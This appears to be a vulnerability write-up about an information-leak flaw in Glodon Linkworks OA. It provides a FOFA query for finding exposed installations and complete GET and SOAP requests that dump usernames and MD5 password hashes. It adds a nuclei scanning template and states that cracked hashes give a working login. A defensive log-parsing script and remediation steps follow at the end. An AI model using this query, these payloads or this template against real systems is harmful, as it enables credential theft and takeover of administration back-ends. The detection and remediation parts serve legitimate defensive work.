Babing
Published on 2024-08-30

G4-2 Glodon (广联达) OA Information Leakage

Vulnerability description:

Glodon (广联达) Linkworks office OA has an information leakage flaw. An attacker can use it to obtain account names and password hashes, log in to the back-end administration interface, and cause further impact from there.

Site screenshots: (images not reproduced in the text)

Network mapping (asset search):

FOFA query:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

Vulnerability reproduction:

Vulnerable URL:

/Org/service/Service.asmx

List all users
payload:

GET /Org/service/Service.asmx/GetUserXml4GEPS HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Pragma: no-cache
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
x-forwarded-for: 127.0.0.1

Result: (screenshot not reproduced in the text)

Query account passwords

POST /Org/service/Service.asmx HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: application/soap+xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <GetUserXml4GEPS xmlns="http://tempuri.org/" />
  </soap12:Body>
</soap12:Envelope>

(screenshot not reproduced in the text)
The returned passwords are MD5 hashes; reversing the MD5 gives a password that logs in to the system.

YAML template (nuclei)

id: G4-2GuangLianDa-InformationLeakage
info:
  name: G4-2GuangLianDa-InformationLeakage
  author: BeR09
  severity: high
  description: 
  reference:
    - https://blog.csdn.net/weixin_46944519/article/details/132976132
  tags: GuangLianDa,InformationLeakage

http:
  - method: GET
    path:
      - "{{BaseURL}}/Org/service/Service.asmx/GetUserXml4GEPS"
    headers:
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
      Cache-Control: no-cache
      Pragma: no-cache
      Proxy-Connection: keep-alive
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
      x-forwarded-for: 127.0.0.1
    matchers:
      - type: word
        words:
          - "<string xmlns=\"http://tempuri.org/\">&lt;ReturnData&gt;&lt;XML&gt;&lt;NewDataSet&gt;&lt;Table&gt;&lt;USR_ID&gt;0&lt;/USR_ID&gt;&lt;USR_CODE&gt;admin&lt;/USR_CODE&gt;&lt;USR_NAME&gt;"
        part: body

Remediation:

1. Disable the page or application that leaks sensitive information.
2. Upgrade to a patched version.
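An added detection example, written for this page and not part of the original write-up or of the vendor's product: it parses constructed web-server access-log lines (combined log format; the IPs, timestamps and sizes are invented) and flags requests to the Service.asmx endpoint described above, so an administrator can spot probing or actual disclosure in the logs until the fix is applied.

```python
import re
from collections import namedtuple

# Combined log format: ip ident user [ts] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Endpoints named in the write-up: the web method reachable by plain GET and
# the SOAP service itself, which accepts the same call via POST.
LEAK_GET_PATH = "/org/service/service.asmx/getuserxml4geps"
SERVICE_PATH = "/org/service/service.asmx"

Hit = namedtuple("Hit", "ip ts method path status reason")


def classify(method, path, status):
    """Return a reason string when the request matches the leak pattern, else None."""
    clean = path.split("?", 1)[0].rstrip("/").lower()
    if clean == LEAK_GET_PATH and status == 200:
        return "GetUserXml4GEPS returned 200: user list likely disclosed"
    if clean == SERVICE_PATH and method == "POST" and status == 200:
        return "SOAP POST to Service.asmx succeeded: inspect body for GetUserXml4GEPS"
    if clean.startswith(SERVICE_PATH):
        return "access to Service.asmx endpoint (status %d)" % status
    return None


def scan(lines):
    """Parse each log line and collect the requests that hit the vulnerable service."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        status = int(m.group("status"))
        reason = classify(m.group("method"), m.group("path"), status)
        if reason:
            hits.append(Hit(m.group("ip"), m.group("ts"), m.group("method"),
                            m.group("path"), status, reason))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Aug/2024:10:01:02 +0800] "GET /Org/service/Service.asmx/GetUserXml4GEPS HTTP/1.1" 200 18342 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [30/Aug/2024:10:01:05 +0800] "POST /Org/service/Service.asmx HTTP/1.1" 200 18201 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [30/Aug/2024:10:02:10 +0800] "GET /Services/Identification/login.ashx HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [30/Aug/2024:10:03:00 +0800] "GET /Org/service/Service.asmx/GetUserXml4GEPS HTTP/1.1" 403 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print("%s %s %s %s -> %s" % (h.ts, h.ip, h.method, h.path, h.reason))
```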

Reference:

https://blog.csdn.net/weixin_46944519/article/details/132976132
